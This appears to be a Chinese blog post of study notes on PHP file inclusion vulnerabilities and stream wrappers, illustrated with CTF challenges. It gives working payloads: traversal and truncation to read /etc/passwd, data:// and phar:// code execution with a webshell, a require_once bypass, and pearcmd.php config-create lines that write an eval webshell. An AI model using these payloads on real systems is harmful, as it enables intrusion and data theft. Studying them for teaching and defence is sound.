文件包含漏洞&伪协议

已于 2022-04-16 13:35:22 修改
阅读量2.3k 收藏 10
点赞数 5
分类专栏: 学习笔记 文章标签: web安全 安全 php
于 2022-04-16 13:34:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62078839/article/details/124208151
版权

文件包含

文件包含漏洞原理

PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入

include:包含并运行指定的文件,包含文件发生错误时,程序警告,但会继续执行。
include_once:检查这个文件是否已经被导入,如果已导入,便不会再导入。

require:包含并运行指定的文件,包含文件发生错误时,程序直接终止执行。
require_once:和 require 类似,不同处在于 require_once 只导入一次。

文件包含类型

本地包含(LFI)

能够读取或执行包含本地文件

远程包含(RFI)

allow_url_fopen和allow_url_include要为On

文件包含函数是可以加载远程文件的,这种漏洞被称为远程文件包含漏洞

文件包含前提

1. 程序用 include() 等文件包含函数通过动态变量的范式引入需要包含的文件
2. 用户能够控制该动态变量
3. 要保证 php.ini allow_url_fopen 和allow_url_include 要为 On

文件包含常见防御及绕过方式

双写绕过

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\\" ), "", $file );

?>

str_replace() 函数替换字符串中的一些字符(区分大小写)。

这里我们以'../'为例:  '..././'中的'../'被去除,则'..././'变为'../'以此来绕过

截断

<?php

    $file = $_GET['file'];

    include '/var/www/html/'.$file.'/test/test.php';

?>

 这里对文件位置进行了限制,比较“难”去包含前面提到的种种文件

1、%00 截断

需要 magic_quotes_gpc=off,PHP 小于 5.3.4 有效

?file=../../../../../../../../../etc/passwd%00

2、%00 截断目录遍历

需要 magic_quotes_gpc=off

?file=../../../../../../../../../var/www/%00

3、路径长度截断

php 版本小于 5.2.8 可以成功,linux 需要文件名长于 4096,windows 需要长于 256

?file=../../../../../../../../../etc/passwd/././././././.[…]/./././././.

PHP 中的封装协议(伪协议)

file:///var/www/html 访问本地文件系统

ftp://<login>:<password>@<ftpserveraddress> 访问 FTP(s) URLs

data:// 数据流

http:// — 访问 HTTP(s) URLs

ftp:// — 访问 FTP(s) URLs

php:// — 访问各个输入/输出流

zlib:// — 压缩流

data:// — Data (RFC 2397)

glob:// — 查找匹配的文件路径模式

phar:// — PHP Archive

ssh2:// — Secure Shell 2

rar:// — RAR

ogg:// — Audio streams

expect:// — 处理交互式的流

file:// 

本地文件传输协议,File协议主要用于访问本地计算机中的文件

php://

 data://

  • allow_url_fopen :on
  • allow_url_include:on
    ?file=data:text/plain,<?php phpinfo();?>

    ?file=data:text/plain;base64,base64编码的payload

 php://input

php://input是个可以访问请求的原始数据的只读流

allow_url_include = On。

对 allow_url_fopen 不做要求。

 filter:

php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。

 更多关于php://filter的妙用还可以读P神的这篇文章

谈一谈php://filter的妙用

phar://

数据流包装器。phar的本质是一种压缩文件。

这里我们一一道题目为例

 该靶场下存在一个about.inc文件

而url中却显示的是这样,猜测后端代码应该是包含了

include $_GET['moudle'].'.inc';

我们可以先写一个小马,再将小马以zip格式压缩,并将压缩后的文件后缀名改为.png上传

 再来用phar://来解析

 小马成功运行蚁剑连接

 我们再来看一下后端代码

 确实如此

zip://

php 版本大于等于 php5.3.0

若是使用相对路径,则会包含失败。

协议原型:zip://archive.zip(压缩包名称)#dir/file.txt(压缩文件名称)

注意 url 编码,因为这个 # 会和 url 协议中的 # 冲突(%23)

 其他有关文件包含的知识

require_once 绕过不能重复包含文件的限制

以[WMCTF2020]Make PHP Great Again为例

<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
  require_once $_GET['file'];
}

 php的文件包含机制是将已经包含的文件与文件的真实路径放进哈希表中

我们都知道require_once在调用时php会检查该文件是否已经被包含过,而这里在前面就已经包含了文件,我们在后面再想包含'flag.php'时就不能实现了,而我们需要做到就是怎么绕过这个哈希表,让php认为我们传入的文件名不在哈希表中,又可以让php能找到这个文件,读取到内容。

payload=?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

 详情原理可看此篇文章

php源码分析 require_once 绕过不能重复包含文件的限制

pearcmd.php到getshell

pecl是PHP中用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库。

 pear中可以利用的参数:

 我们以一题为例:

源码如下

 <?php
#flag is in flag.php
error_reporting(0);
show_source(__FILE__);
#No session.upload_progress!!!!
ini_set("session.auto_start","0");
ini_set("session.use_strict_mode","1");
$path=$_GET['path'];
if(is_null($path))
exit("<br>input sth bro~<br>");
echo "<br>you input=>".$path;
#No PHP protocol!
if(preg_match("/filter|input|data|phar|http|https|zlib|glob|rar|ogg|expect|ftp/i",$path)===0){
    #No loggggggggggggggg~
    if(preg_match("/log|access|error/i",$path)===0){
        if(preg_match("/flag/i",$path)===0){
            echo "<br>U did it!<br>";
            include $path;
        }else{
                exit("<br>oh nooooooooo~<br>");
        }
    }else{
        exit("<br>log file?oh nooooooo~<br>");
    }
}else{
    exit("<br>no protocol~<br>");
}
?>

禁止了session.upload_progress,禁止了伪协议读取,也禁止了文件包含日志文件

这里我们可以包含到pear中的文件,进而利用其中的特性来搞事。

config-create(创建默认配置文件),这个命令需要传入两个参数,其中第二个参数是写入的文件路径,第一个参数会被写入到这个文件中。

payload:?path=/usr/local/lib/php/pearcmd.php&+config-create+/<?=eval($_POST[cmd]);?>+/tmp/fuck.php
payload:?+config-create+/&path=/usr/local/lib/php/pearcmd.php&/<?=eval($_POST[cmd]);?>+/tmp/fuck.php

 这两个payload是一样的,最好在BP上进行写入webshell,因为在浏览器上<>会自动url转码,这样会导致写入失败

 更加详细的原理参考P神文章

Docker PHP裸文件本地包含综述

H3018-R
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB入门——文件包含漏洞PHP伪协议
HasntStartIsOver的博客
06-04 911
在程序员开发过程中,通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需在此编写,这种调用文件的过程一般被称为文件包含。随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校检或者校检被绕过就造成了文件包含漏洞
文件包含漏洞php伪协议
qq_46485934的博客
09-26 799
一.前情提要 本人在写buuctf的时候,碰到一道文件包含php伪协议的题目include 于是,我就想深入的了解一下PHP伪协议 二.文件包含函数 首先归纳下常见的文件包含函数:include,require,include_once,require_once,highlight_file,show_source,readfile,file_get_contents,fopen,file 三.伪协议 php伪协议php封装协议,这些协议常被CTF出题中与文件包含漏洞结合。这里做个小结,涉及的相关伪协议
渗透测试-文件包含漏洞以及php伪协议的应用
lza20001103的博客
07-20 3257
渗透测试-文件包含漏洞以及php伪协议的应用
<?php highlight_file(__FILE__); error_reporting(0); $file = $_GET["file"]; if (stristr($file, "file")){ die("你败了."); } //fl
weixin_35753431的博客
01-11 1683
这段代码是一个 PHP 程序,它实现了从用户输入中获取文件名并输出文件内容的功能。 首先,通过调用 highlight_file(FILE) 函数来输出代码,并通过 error_reporting(0) 函数来关闭错误报告。 然后,通过 $_GET["file"] 变量来获取文件名。 之后,判断文件中是否包含"file"字符串 ,如果包含的话,输出 "你败了." 最后,通过 file_get_c...
CTF php特性(中)
最新发布
2301_81556781的博客
07-26 867
所以用匿名类绕过?&v2=a 或者是?我们最终要得到 $flag 的值,就需要 var_dump($$v1) 中的 $v1 为 flag,即 $v2 要为 flag,这样 $$v2 就为 $flag,&$$v2 就为 $flag 对应的值。要想跨过词法作用域的限制,可以用 GLOBALS 常量数组,其中包含了 $flag 键值对,就可以将 $flag 的值赋给 $$v1。num=%0c36 此时$num不等于36,且为数字,trim以后也不等于36,且'\x0c36'=='36'
ctfshow web入门 php特性
Sentiment的博客
04-11 5386
web89 intval() 函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if
CTFSHOW-文件包含
Monica的博客
09-12 6032
WEB78 题目: <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 知识点:php伪协议 php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。 1、php://input
php伪协议漏洞_文件包含漏洞+PHP伪协议
weixin_31706903的博客
01-17 397
BugkuCTF点击发现url中有 ?file=show.php 并且题目flag在index里 猜测文件包含PHP伪协议。猜测php://被过滤构造payload?file=php://filter/read=convert.base64-encode/resource=index.php用base64解码找到flagBugku-ctferror_reporting(0);if(!$_GET[...
php伪协议.zipphp伪协议.zip
02-24
在提到的“php伪协议.docx”文件中,可能包含了更详细的关于PHP伪协议的使用示例、历史背景,以及如何在受限环境中安全地使用这些机制的信息。这个文档可能涵盖了如何在不违反安全策略的情况下,利用PHP伪协议来实现...
信息安全技术基础:本地文件包含漏洞.pptx
11-01
【信息安全技术基础:本地文件包含漏洞】 在网络安全领域,本地文件包含漏洞(Local File Inclusion,简称LFI)是一种常见的安全问题,它涉及到网站应用程序如何处理用户输入来决定要加载的本地文件。这类漏洞允许...
php伪协议.pdfphp伪协议.pdfphp伪协议.pdf
02-24
- 当存在 SSRF 漏洞文件包含漏洞时,可以用来读取系统中的任意文件。 - 在文件包含漏洞中,攻击者可能会尝试使用此协议执行任意系统命令或读取敏感文件。 ##### 2. `php://input` - **定义**:用于访问 HTTP ...
PHP 伪协议大总结.docx
02-24
伪协议(pseudo-protocol)指的是由PHP内部实现的特定协议,它们允许开发者通过简单的字符串指定的方式访问各种不同的资源,如文件系统、输入输出流等。这种机制为开发者提供了极大的灵活性,同时也带来了一定的安全...
信息安全技术:PHP伪协议.pptx
11-01
PHAR文件可以包含整个项目,便于分发和部署,但应确保对PHAR的签名验证以防止恶意代码注入。 8. rar:// - RAR `rar://`协议允许PHP脚本直接操作RAR文件,但这通常不是PHP的标准特性,需要额外的扩展支持。 9. ...
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 5880
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
【ctfshow】PHP特性2
qq_61109509的博客
02-20 983
目录 web100 web101 web102 web103 web104 web105 web106 web107 web108 web109 web110 web100 include("ctfshow.php"); //flag in class ctfshow; $ctfshow = new ctfshow(); $v1=$_GET['v1']; $v2=$_GET['v2']; $v3=$_GET['v3']; $v0=is_numeric($...
文件包含漏洞& 文件伪协议利用
cike_y
09-11 1721
可能你会问,为什么不是php后缀名而是txt格式,因为我尝试过了,如果是使用的是php格式,那么服务端访问的时候不仅不需要解析,而且只是单纯的访问我的php代码,执行的是我自己的脚本,而不是服务器。就有题目所说是远程包含漏洞,我也懒得测试了,可以发现输入百度链接的时候直接跳转,那么我们可以尝试构造一句话木马搭建在本地的服务,让文件包含解析到攻击者的文本文件而成功的触发到让脚本代码得到解析。我在测试的时候忘记了自己的网站服务是搭建在D盘里,而我的文件是在E盘所以我以为是我的文件包含代码写错了。
CTFSHOW-PHP反序列化
Monica的博客
09-24 2635
WEB254 题目: <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->
CTFSHOW反序列化
v2ish1yan的博客
08-06 237
ctfshow 反序列化
CTF.show 文件包含
m0_64444909的博客
08-25 1870
ctf文件包含
<?php highlight_file(__FILE__); error_reporting(0); $file = $_GET[
09-18
这段代码是一个简单的 PHP 文件浏览器。它使用 highlight_file 函数高亮显示当前文件的内容,并且通过 $_GET 变量接收一个名为 file 的参数来指定要查看的文件名。为了防止显示可能的错误信息,error_reporting 函数被用于关闭错误报告。 请注意,接受用户提供的输入并直接在代码中使用是不安全的,因为它可能导致代码注入和其他安全漏洞。在实际应用中,应该对用户输入进行验证和过滤,以确保安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值